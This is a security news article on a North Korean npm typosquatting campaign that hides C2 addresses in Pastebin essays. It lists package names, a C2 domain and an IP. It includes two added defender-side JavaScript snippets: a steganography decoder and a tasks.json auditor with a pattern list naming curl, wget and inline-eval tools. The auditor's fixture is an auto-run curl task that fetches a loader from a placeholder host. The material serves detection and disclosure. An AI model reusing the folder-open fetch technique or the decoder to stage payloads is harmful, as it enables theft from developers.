
Cybersecurity researchers have revealed a new iteration of the ongoing Contagious Interview campaign, in which North Korean threat actors published a set of 26 malicious packages to the npm registry.
Although these packages pose as developer tools, they use seemingly innocuous Pastebin content as a dead-drop resolver to recover the real command-and-control (C2) address and ultimately drop credential stealers and remote access trojans targeting developers. The C2 infrastructure is hosted on Vercel across 31 deployments.
The campaign is being tracked by Kieran Miyamoto of Socket and kmsec.uk under the name StegaBin.
“The loader extracts a steganographically encoded C2 URL within the three Pastebin pastes, which is an innocuous computer science essay with evenly spaced characters replaced, detailing the hidden infrastructure address,” said Socket researchers Philipp Burckhardt and Peter van der Zee.
The 26 malicious npm packages are:
argonist@0.41.0, bcryptance@6.5.2, bee-quarl@2.1.2, bubble-core@6.26.2, corstoken@2.14.7, daytonjs@1.11.20, ether-lint@5.9.4, expressjs-lint@5.3.2, fastify-lint@5.8.0, formmiderable@3.5.7, hapi-lint@19.1.2, iosysredis@5.13.2, jslint-config@10.22.2, jsnwebapptoken@8.40.2, kafkajs-lint@2.21.3, loadash-lint@4.17.24, mqttoken@5.40.2, prism-lint@7.4.2, promanage@6.0.21, sequelization@6.40.2, typoriem@0.4.17, undicy-lint@7.23.1, uuindex@13.1.0, vitetest-lint@4.1.21, windowston@3.19.2, zoddle@4.4.2
All identified packages ship with an installation script (‘install.js’) that runs automatically during package installation and executes the malicious payload located at ‘vendor/scrypt-js/version.js’. Another commonality across the 26 packages is that they explicitly declare the canonical packages they typosquat as dependencies in order to appear trustworthy.
The payload acts as a text steganography decoder: it fetches the Pastebin URL and parses its contents to obtain the actual C2 Vercel URL. Although the paste appears to contain an innocuous essay about computer science, the decoder reads specific characters at specific positions within the text and strings them together to produce a list of C2 domains.
“The decoder removes zero-width Unicode characters, reads five-digit long markers from the beginning, calculates evenly spaced character positions throughout the text, and extracts the character at that position,” Socket said. “The extracted characters are split on the ||| delimiter (with an ===END=== ending marker) to produce an array of C2 domain names.”
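The decoding steps quoted above, reproduced as a defender-side analysis tool so that a captured paste can be turned into a blocklist. This is an added example, not Socket's or the malware's code; it assumes the five-digit marker is a decimal count of hidden characters and that those characters sit at evenly spaced offsets through the rest of the text (the ||| and ===END=== markers come from the article).

```javascript
// Added example (not Socket's or the malware's code): decoder for the character-level
// steganography described in the article. Assumptions: the first five visible characters
// are a decimal count of hidden characters, which sit at evenly spaced offsets in the
// remainder of the paste; "|||" separates domains and "===END===" terminates the list.
const ZERO_WIDTH = /[\u200B\u200C\u200D\u2060\uFEFF]/g;

function decodePaste(raw) {
  const text = raw.replace(ZERO_WIDTH, "");      // 1. strip zero-width Unicode characters
  const marker = text.slice(0, 5);               // 2. five-digit marker at the start
  if (!/^\d{5}$/.test(marker)) return null;      //    not a stego paste: bail out
  const count = parseInt(marker, 10);
  const body = text.slice(5);
  if (count === 0 || body.length < count) return null;
  const step = Math.floor(body.length / count);  // 3. evenly spaced character positions
  let hidden = "";
  for (let i = 0; i < count; i++) hidden += body[i * step];
  const end = hidden.indexOf("===END===");       // 4. end marker, then split on |||
  if (end === -1) return null;
  return hidden.slice(0, end).split("|||").filter(Boolean);
}

// Constructed fixture (not a real paste): marker 00036, hidden characters at every second
// position, two zero-width characters sprinkled in, placeholder domains under the reserved
// .example TLD.
const SAMPLE_PASTE =
  "00036" +
  "cc2o-map.uet\u200Bxianmgp lies| |t|hce2 -sbt.ued\u200Dxya mopfl ea=l=g=oErNiDt=h=m=.";

console.log(decodePaste(SAMPLE_PASTE));        // [ 'c2-a.example', 'c2-b.example' ]
console.log(decodePaste("Just an essay."));    // null
```

Because the marker and spacing are derived from the text itself, a paste that decodes to a well-formed domain list is a strong signal on its own; a plain essay returns null.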
The malware then contacts the decoded domain to obtain platform-specific payloads for Windows, macOS, and Linux, a tactic widely observed in the Contagious Interview campaign. One such domain, ext-checkdin.vercel[.]app, serves a shell script that contacts the same URL to retrieve the RAT components.
The trojan connects to 103.106.67[.]63:1244 and waits for further instructions, which allow changing the current directory and running shell commands. It then deploys a comprehensive intelligence collection suite of nine modules covering Microsoft Visual Studio Code (VS Code) persistence, keylogging and clipboard theft, browser credential collection, TruffleHog secret scanning, and Git repository and SSH key disclosure.
The nine modules are as follows:
- vs: leverages the runOn: “folderOpen” trigger so that a malicious task.json contacts the Vercel domain every time a project is opened in VS Code. The module scans the victim’s VS Code config directory on all three platforms and writes the malicious task.json there directly.
- clip: a keylogger, mouse tracker, and clipboard stealer that supports active-window tracking and exfiltrates every 10 minutes.
- bro: a Python payload for stealing the browser’s credential store.
- j: a Node.js module for browser and cryptocurrency theft targeting Google Chrome, Brave, Firefox, Opera, Microsoft Edge, and extensions such as MetaMask, Phantom, Coinbase Wallet, Binance, Trust, Exodus, and Keplr. On macOS it also targets the iCloud Keychain.
- z: enumerates the file system and steals files matching predefined patterns.
- n: a RAT that gives attackers real-time remote control of infected hosts via a persistent WebSocket connection to 103.106.67[.]63:1247 and exfiltrates the desired data via FTP.
- truffle: downloads the genuine TruffleHog secret scanner from its official GitHub page to discover and exfiltrate developer secrets.
- git: collects files from .ssh directories, extracts Git credentials, and scans repositories.
- sched: identical to ‘vendor/scrypt-js/version.js’ and redeployed as a persistence mechanism.
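A defender-side check for the VS Code persistence described in the vs module: audit a parsed tasks file for tasks that fire automatically on folder open and whose command line reaches out to the network or evaluates downloaded code. This is an added example, not from the article or Socket; the schema key runOptions.runOn: "folderOpen" is VS Code's real one, the sample object and its placeholder URL are constructed, and args are assumed to be plain strings.

```javascript
// Added example (not from the article or Socket): audit a parsed VS Code tasks object for
// auto-run tasks ("runOptions": { "runOn": "folderOpen" } is the real VS Code key) whose
// command line contains network or code-evaluation indicators. Sample data is constructed.
const RISKY_PATTERNS = [
  /https?:\/\//i,          // any URL on the command line
  /\b(curl|wget)\b/i,      // download tools
  /\bnode\s+-e\b/i,        // inline JavaScript evaluation
  /\bpowershell\b/i,       // script host on Windows
];

function auditTasks(tasksJson) {
  const findings = [];
  for (const task of tasksJson.tasks || []) {
    const autoRun = !!task.runOptions && task.runOptions.runOn === "folderOpen";
    if (!autoRun) continue;                      // only tasks that run without a user action
    // Assumption: args are plain strings (VS Code also allows quoted-argument objects).
    const line = [task.command, ...(task.args || [])].join(" ");
    const matched = RISKY_PATTERNS.filter((re) => re.test(line)).map((re) => re.source);
    findings.push({ label: task.label, commandLine: line, risky: matched.length > 0, matched });
  }
  return findings;
}

// Constructed fixture: one benign build task and one auto-run task that downloads from a
// placeholder domain under the reserved .example TLD.
const SAMPLE_TASKS = {
  version: "2.0.0",
  tasks: [
    { label: "build", type: "shell", command: "npm", args: ["run", "build"] },
    {
      label: "update",
      type: "shell",
      command: "curl",
      args: ["-fsSL", "https://c2-placeholder.example/loader"],
      runOptions: { runOn: "folderOpen" },
    },
  ],
};

console.log(auditTasks(SAMPLE_TASKS));   // one finding: label "update", risky: true
```

Real tasks.json files are JSONC (comments and trailing commas are allowed), so parse them with a JSONC-aware parser before passing the object to auditTasks, and check both the workspace .vscode directory and the user-level config directory on each platform.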
“While previous waves of Contagious Interview campaigns relied on relatively simple malicious scripts and Bitbucket-hosted payloads, this latest iteration demonstrates a concerted effort to evade both automated detection and human review,” Socket concluded.
“The use of character-level steganography on Pastebin and multi-stage Vercel routing indicates that attackers are looking to improve their evasion techniques and make their operations more resilient.”
This disclosure comes amid observations that North Korean threat actors are also publishing malicious npm packages (such as express-core-validator) to obtain next-stage JavaScript payloads hosted on Google Drive.
“Only one package has been released using this new technology,” Miyamoto said. “FAMOUS CHOLLIMA will likely continue leveraging multiple technologies and infrastructure to deliver subsequent payloads. It is unlikely that this represents a complete overhaul of stager operations at npm.”
